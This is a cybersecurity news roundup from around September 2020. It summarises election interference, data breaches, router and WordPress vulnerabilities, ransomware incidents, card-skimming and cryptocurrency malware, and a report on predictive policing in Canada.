Table of Contents

  1. Politics
    1. Russian agency created fake leftwing news outlet with fictional editors, Facebook says
    2. CISA and FBI say they have not seen cyber-attacks this year on voter registration databases
    3. Pakistan blocks 'immoral' Tinder, Grindr and other apps
    4. Facebook to block news on Australian sites after new law, riling lawmakers
  2. Breaches
    1. Mansfield City Schools: No personal data compromised during cyber attack
    2. Experian (South Africa) - 1,284,637 breached accounts
    3. Hackers breached Norwegian Parliament emails to steal data
    4. Twitter Hack May Have Had Another Mastermind: A 16-Year-Old
    5. American Payroll Association discloses credit card theft incident
    6. PULAU Corporation notifies employees of June hack
    7. AusCERT says alleged DoE hack came from a third-party
  3. Misc
    1. CEOs could soon be personally liable for cyberattacks
    2. CipherTrace Provided Feds with "Monero Tracing" Tools
    3. Google now pays for bugs used to bypass its anti-fraud systems
    4. Over 400 GOV.UK domains found on spam blacklists
    5. Tor launches membership program to secure finance, boost integration
  4. Vulnerabilities
    1. 700,000 WordPress Users Affected by Zero-Day Vulnerability in File Manager Plugin
    2. JITSploitation
    3. Cisco warns of actively exploited bugs in carrier-grade routers
    4. wolfSSL TLS 1.3 Client Man-in-the-Middle Attack (CVE-2020-24613)
  5. Crime
    1. Iranian hackers are selling access to corporate networks
    2. Average BEC attempts are now $80k, but one group is aiming for $1.27m per attack
  6. Ransomware
    1. Amphastar Pharmaceuticals discovers that threat actors had exfiltrated employee data in May ransomware attack
    2. Rocky Mount hit by ransomware, investigating and trying to recover
  7. Malware
    1. Credit card data smuggled via private Telegram channel
    2. Apple Accidentally Approved Malware to Run on macOS
    3. Cybersquatting: Attackers Mimicking Domains of Major Brands Including Facebook, Apple, Amazon and Netflix to Scam Consumers
    4. COVID-19 Phishing Scheme Spreads AgentTesla Trojan
    5. Hackers are backdooring QNAP NAS devices with 3-year old RCE bug
    6. New KryptoCibule Windows malware is a triple threat for cryptocurrency users
  8. Privacy
    1. Police across Canada are using predictive policing algorithms, report finds

Politics

Russian agency created fake leftwing news outlet with fictional editors, Facebook says

The Russian agency that interfered in the 2016 US election created a fake leftwing news publication, staffed it with fake editors with AI-generated photos and hired real freelance reporters as part of a fresh influence operation detected and removed by Facebook, the company said on Tuesday. The latest operation by the Internet Research Agency (IRA) was still in its early stages when it was detected thanks to a tip from the FBI, according to Facebook's head of security policy, Nathaniel Gleicher. The network had 13 accounts and two pages, with about 14,000 total followers. *The Facebook accounts and pages were designed to bolster PeaceData.net, an English- and Arabic-language website that claims to be a "global news organization", but whose editorial staff are fictitious. Headshots of PeaceData's "staff" were created using Generative Adversarial Networks, a type of AI that can produce lifelike images of faces, according to Graphika, a social media analysis firm that produced a report on the IRA operation.

CISA and FBI say they have not seen cyber-attacks this year on voter registration databases

The Cybersecurity and Infrastructure Security Agency and the Federal Bureau of Investigation said that they have not seen any cyber-attacks target US voter registration databases and voting systems this year. The article, published by Russian news agency Kommersant, claimed that a Russian hacker had obtained voter records for more than 7.6 million Michigan voters following an intrusion into the state's database earlier this year, in March. According to Kommersant, the hacker also claimed to be in possession of voter records for Connecticut, Arkansas, Florida, and North Carolina voters, but in smaller numbers, and was making all the databases available for free on a hacking forum since July.

Pakistan blocks 'immoral' Tinder, Grindr and other apps

Pakistan's government has blocked Tinder, Grindr and three other dating apps, its latest move to curb online platforms deemed to be disseminating "immoral content". In Pakistan extramarital relationships and homosexuality are illegal. The Pakistan Telecommunications Authority said it has sent notices to the management of the five apps, "keeping in view the negative effects of immoral/indecent content streaming". *PTA said the notices issued to Tinder, Grindr, Tagged, Skout and SayHi sought the removal of "dating services" and moderation of live streaming content in accordance with local laws.

Facebook to block news on Australian sites after new law, riling lawmakers

Facebook on Tuesday said it would stop Australians sharing news content on its platforms if a proposal to make it pay local media outlets for their content becomes law, escalating tension with the Australian government. The world's largest social network also updated its "terms of use" on Tuesday to say that it can block content anywhere globally or restrict users from accessing the services if such a move is warranted to avoid regulatory risks. "This global update provides more flexibility for us to change our services, including in Australia, to continue to operate and support our users in response to potential regulation or legal action," a company spokesperson said.

Breaches

Mansfield City Schools: No personal data compromised during cyber attack

No "personal information" was accessed during a recent cyber attack on Mansfield City Schools, according to superintendent Stan Jefferson. Jefferson sent a letter to staff and district families Tuesday morning addressing the incident. "We want to assure you that we successfully contained the threat and at no time was any of the personal information of our students, families or staff compromised," Jefferson wrote.

Experian (South Africa) - 1,284,637 breached accounts

In August 2020, Experian South Africa suffered a data breach which exposed the personal information of tens of millions of individuals. Only 1.3M of the records contained email addresses, whilst most contained government issued identity numbers, names, addresses, occupations and employers, amongst other person information.

Hackers breached Norwegian Parliament emails to steal data

Attackers have compromised a limited number of email accounts of Norwegian Parliament (Storting) representatives and employees according to Storting's managing director Marianne Andreassen. After gaining access to the email inboxes, the hackers stole unspecified amounts of data from each of the hacked email accounts according to a statement published on the parliament's site. At the moment, the investigators haven't yet discovered what kind of data was exfiltrated by the attackers from the compromised Storting email accounts. The Parliament is closely working with relevant security authorities to investigate the attack and Andreassen said that the incident was reported by Storting's administration to the Norwegian Police Security Service (PST). "PST is aware of the IT attack on the Storting," a tweet from PST's official Twitter account reads. "Once PST has received the report, we will assess whether there is a basis for starting an investigation."

Twitter Hack May Have Had Another Mastermind: A 16-Year-Old

When authorities arrested Graham Ivan Clark, who they said was the "mastermind" of the recent Twitter hack that ensnared Kanye West, Bill Gates and others, one detail that stood out was his age: He was only 17. Now authorities have homed in on another person who appears to have played an equal, if not more significant role, in the July 15 attack, New York Times reported Tuesday, citing four people involved in the investigation who declined to be identified because the inquiry was ongoing. They said the person was at least partly responsible for planning the breach and carrying out some of its most sensitive and complicated elements. The search warrant and other documents in the case are under seal and federal agents may decide not to charge the youth with a crime. If he is ultimately arrested, the case is likely to be handed over to Massachusetts authorities, who have more leverage than federal prosecutors in charging minors as adults.

American Payroll Association discloses credit card theft incident

The American Payroll Association (APA) disclosed a data breach affecting members and customers after attackers successfully planted a web skimmer on the organization's website login and online store checkout pages. APA discovered around July 23, 2020, that its website and online store were breached by unknown threat actors who deployed a skimmer designed to collect and exfiltrate sensitive information to attacker-controlled servers. The attackers used a security vulnerability in the organization's content management system (CMS) to hack into APA's site and online store according to a data breach notification sent to affected individuals by Robert Wagner, APA's Senior Director of Govt. and Public Relations, Certification, and IT.

PULAU Corporation notifies employees of June hack

Defense supplier PULAU Corporation is notifying their employees about an intrusion and unauthorized access into parts of their network between June 11 and June 29. Based on their investigation, they believe the unauthorized party acquired certain employment-related records stored on the affected systems. The affected records contained certain personal information, such as name, contact information, date of birth, government-issued ID (such as Social Security, passport, military ID, tax ID and/or driver's license numbers), financial account information (such as bank account and/or payment card information), online account usernames and passwords, and/or health-related information (including health insurance information). Importantly, not all of this information was affected for each impacted individual.

AusCERT says alleged DoE hack came from a third-party

The Australian Computer Emergency Response Team (AusCERT) denied claims that hackers had breached the Department of Education, Skills, and Employment (DoE), and downloaded the personal details of more than one million students, teachers, and staff. Rumors of a supposed hack first surfaced after a hacker shared an archive file on a hacker forum, which they initially advertised as data obtained from the Australian DoE. According to a screenshot of a now-deleted forum post, the hacker claimed the data contained more than one million records for Australian students, teachers, and DoE staff, that they obtained back in 2019.

Misc

CEOs could soon be personally liable for cyberattacks

Within four years, the majority of CEOs will be held personally responsible for cyberattacks that lead to injury and other physical damage. This is according to a new report from Gartner, which asserts that liability for cyber-physical security incidents will "pierce the corporate veil to personal liability" for 75 percent of CEOs by 2024. Cyber-physical systems (CPS) are described as digital systems that interact with the physical world, such as IoT devices or operational technologies (OT). "Regulators and governments will react promptly to an increase in serious incidents resulting from failure to secure CPSs, drastically increasing rules and regulations governing them," said Katell Thielemann, Research Vice President at Gartner.

CipherTrace Provided Feds with "Monero Tracing" Tools

CipherTrace, a self-described "Blockchain Forensics Team," reportedly created "Monero tracing" tools for the U.S. Department of Homeland Security. CipherTrace's contract with DHS Science & Technology Directorate resulted in the development of forensic tools for law enforcement and government agencies to trace and visualize Monero transaction flows for criminal investigations. CipherTrace developed tools to explore Monero transactions to assist in investigations. These tools include transaction search, exploration, and visualization tools for Monero transaction flows that have been integrated with CipherTrace's Inspector financial investigations product. This provides ways to track stolen Monero currencies or Monero currencies used in illegal transactions. It also helps assure cryptocurrency exchanges, OTC trading desks, investment funds and custody providers that they do not accept Monero from illicit sources and investigate Monero received from potentially illicit sources and take appropriate actions to stay in compliance.

Google now pays for bugs used to bypass its anti-fraud systems

Google announced that the company's Vulnerability Reward Program has expanded to also include bug reports on methods threat actors can use to bypass the company's abuse, fraud, and spam systems. "A few examples of potentially valid reports for this program could include bypassing our account recovery systems at scale, identifying services vulnerable to brute force attacks, circumventing restrictions on content use and sharing, or purchasing items from Google without paying," Google's Eric Brown and Marc Henson said.

Over 400 GOV.UK domains found on spam blacklists

Hundreds of domains managed by the U.K. government are on DNS-based blacklists creating email communication problems. Multiple government agencies, councils, and public welfare agencies rely on GOV.UK domain infrastructure to provide online services to Britain's residents. Being on an automated IP blacklist usually signifies a problem with your mail infrastructure: most likely either your server has been sending spam, or was compromised at some point.

Tor launches membership program to secure finance, boost integration

The Tor Project has launched the Tor Project Membership Program to secure the network's future by diversifying funding and deepening partnerships with other software providers. The non-profit's new scheme brings together Avast, DuckDuckGo, Insurgo, Mullvad VPN, and Team Cymru as founding members. The companies are all involved in the security and privacy realm and will help secure diverse funding sources.

Vulnerabilities

700,000 WordPress Users Affected by Zero-Day Vulnerability in File Manager Plugin

Wordfence Threat Intelligence team was alerted to the presence of a vulnerability being actively exploited in File Manager, a WordPress plugin with over 700,000 active installations. This vulnerability allowed unauthenticated users to execute commands and upload malicious files on a target site. A patch was released on September 1, 2020. Researchers are seeing this vulnerability being actively exploited in the wild, therefore, they urge users to update to the latest version, 6.9, immediately since it contains a patch for this vulnerability and will keep you protected.

JITSploitation

This three-part series from Google Project Zero highlights the technical challenges involved in finding and exploiting JavaScript engine vulnerabilities in modern web browsers and evaluates current exploit mitigation technologies. The exploited vulnerability, CVE-2020-9802, was fixed in iOS 13.5, while two of the mitigation bypasses, CVE-2020-9870 and CVE-2020-9910, were fixed in iOS 13.6.

Cisco warns of actively exploited bugs in carrier-grade routers

Cisco warned over the weekend that threat actors are trying to exploit two high severity memory exhaustion denial-of-service (DoS) vulnerabilities in the company's Cisco IOS XR software that runs on carrier-grade routers. Cisco's IOS XR Network OS is deployed on multiple router platforms including NCS 540 & 560, NCS 5500, 8000, and ASR 9000 series routers. Cisco hasn't yet released software updates to address these actively exploited zero-days --- tracked as CVE-2020-3566 and CVE-2020-3569 --- but the company provides mitigation in a security advisory published over the weekend. "On August 28, 2020, the Cisco Product Security Incident Response Team (PSIRT) became aware of attempted exploitation of these vulnerabilities in the wild," Cisco explains.

wolfSSL TLS 1.3 Client Man-in-the-Middle Attack (CVE-2020-24613)

wolfSSL is a C-language-based SSL/TLS library targeted at IoT, embedded, and RTOS environments. wolfSSL incorrectly implements the TLS 1.3 client state machine. This allows attackers in a privileged network position to completely impersonate any TLS 1.3 servers and read or modify potentially sensitive information between clients using the wolfSSL library and these TLS servers.

Crime

Iranian hackers are selling access to corporate networks

An Iranian-backed hacker group has been observed while seeking to sell access to compromised corporate networks to other threat actors on underground forums and attempting to exploit F5 BIG-IP devices vulnerable to CVE-2020-5902 exploits. The Iranian hackers have been active since at least 2017 and are being tracked as Pioneer Kitten by cyber-security firm Crowdstrike, as Fox Kitten by threat intelligence firm ClearSky, and as Parisite by ICS security firm Dragos. "This adversary appears to be primarily focused on gaining and maintaining access to entities possessing sensitive information of likely intelligence interest to the Iranian government," CrowdStrike says in a report.

Average BEC attempts are now $80k, but one group is aiming for $1.27m per attack

The average sum that a BEC group will try to steal from a targeted company is now around $80,000 per attack, according to an industry report published on Monday. But according to Agari, a cyber-security firm that's a member of the APWG, in Q2 2020, the BEC threat landscape is seeing yet again another major gang that likes to go after big payouts ---namely, a newly discovered Russia-based BEC group named Cosmic Lynx. Per a report earlier this year, Agari says this group has been active since July 2019, and has targeted 46 entities across six continents in more than 200 distinct campaigns. The group is unique not only because it operates from Russia ---outside of West Africa, where most BEC gangs are located--- but also because the level and scale at which it operates. "The average amount requested by Cosmic Lynx in its attacks is an astounding $1.27 million," Agari said in the APWG report.

Ransomware

Amphastar Pharmaceuticals discovers that threat actors had exfiltrated employee data in May ransomware attack

On July 21, the DoppelPaymer ransomware threat actors added Amphastar Pharmaceuticals to their leak list. They also uploaded a number of files as proof of access and exfiltration. It was because of that listing that Amphastar eventually discovered that employee data had been stolen in a May attack. On August 27, Amphastar sent notification letters to current and former employees whose information was impacted by the attack.

Rocky Mount hit by ransomware, investigating and trying to recover

Add Rocky Mount, North Carolina to the list of governments hit by ransomware. As of Aug. 28, they didn't seem to yet know too much, as WITN reported: Rocky Mount leaders are trying to get the city's network back on track after facing a cyber attack. The city is in the process of confirming what impact the attack may have had on information on the network. Leaders say they know Rocky Mount was the victim of a cyber attack that involved the encryption of certain city systems, and say the investigation will determine if personal information was stolen.

Malware

Credit card data smuggled via private Telegram channel

Security researchers noticed that some cybercriminals attacking online stores are using private Telegram channels to steal credit card information from customers making a purchase on victim sites. The find is the first public documentation of this trick that makes data extraction more efficient and the entire card skimming operation easier to manage. The new method was discovered by Affable Kraut using data from Sansec, a company specialized in fighting digital skimming. The researcher analyzed the malicious JavaScript, which includes common anti-analysis protections. In a thread on Twitter, Kraut explains how the script works, noting that it collects data from any type of input field and sends it to a Telegram channel.

Apple Accidentally Approved Malware to Run on macOS

In an attempt to crack down on growing threats like adware and ransomware, in February Apple began "notarizing" all macOS applications, a vetting process designed to weed out illegitimate or malicious apps. Even software distributed outside of the Mac App Store now needs notarization, or users wouldn't be able to run them without special workarounds. Seven months later, though, researchers have found an active adware campaign attacking Mac users with the same old payloads---and the malware has been fully notarized by Apple. The campaign is distributing the ubiquitous "Shlayer" adware, which by some counts has affected as many as one in 10 macOS devices in recent years. The malware exhibits standard adware behavior, like injecting ads into search results. It's not clear how Shlayer slipped past Apple's automated scans and checks to get notarized, especially given that it's virtually identical to past versions. But it's the first known example of malware being notarized for macOS.

Cybersquatting: Attackers Mimicking Domains of Major Brands Including Facebook, Apple, Amazon and Netflix to Scam Consumers

The Palo Alto Networks squatting detector system discovered that 13,857 squatting domains were registered in December 2019, an average of 450 per day. They found that 2,595 (18.59%) squatted domain names are malicious, often distributing malware or conducting phishing attacks, and 5,104 (36.57%) squatting domains they studied present a high risk to users visiting them, meaning they have evidence of association with malicious URLs within the domain or are utilizing bulletproof hosting.

COVID-19 Phishing Scheme Spreads AgentTesla Trojan

A global phishing campaign that purports to offer information about surgical masks and other personal protective equipment for use during the COVID-19 pandemic is infecting victims' devices with the AgentTesla remote access Trojan, according to researchers at Area 1 Security. The campaign, which appears to have started in May, uses phishing emails that spoof messages from chemical manufacturers as well as import/export businesses, preying on fears of shortages of face masks and forehead thermometers during the pandemic, according to the report.

Hackers are backdooring QNAP NAS devices with 3-year old RCE bug

Hackers are scanning for vulnerable network-attached storage (NAS) devices running multiple QNAP firmware versions, trying to exploit a remote code execution (RCE) vulnerability addressed by QNAP in a previous release. According to a report published by researchers at Qihoo 360's Network Security Research Lab (360 Netlab), unknown threat actors are currently exploiting a remote command execution vulnerability due to a command injection weakness in QNAP NAS devices' firmware.

New KryptoCibule Windows malware is a triple threat for cryptocurrency users

Cyber-security firm ESET has published a report detailing a new strain of Windows malware that the company has named KryptoCibule. ESET says the malware has been distributed since at least December 2018, but only now surfaced on its radar. According to the company, KryptoCibule is aimed at cryptocurrency users, with the malware's main three features being to (1) install a cryptocurrency miner on victims' systems, (2) steal cryptocurrency wallet-related files, and (3) replace wallet addresses in the operating system's clipboard to hijack cryptocurrency payments.

Privacy

Police across Canada are using predictive policing algorithms, report finds

Police across Canada are increasingly using controversial algorithms to predict where crimes could occur, who might go missing, and to help them determine where they should patrol, despite fundamental human rights concerns, a new report has found. To Surveil and Predict: A Human Rights Analysis of Algorithmic Policing in Canada is the result of a joint investigation by the University of Toronto's International Human Rights Program (IHRP) and Citizen Lab. It details how, in the words of the report's authors, "law enforcement agencies across Canada have started to use, procure, develop, or test a variety of algorithmic policing methods," with potentially dire consequences for civil liberties, privacy and other Charter rights, the authors warn.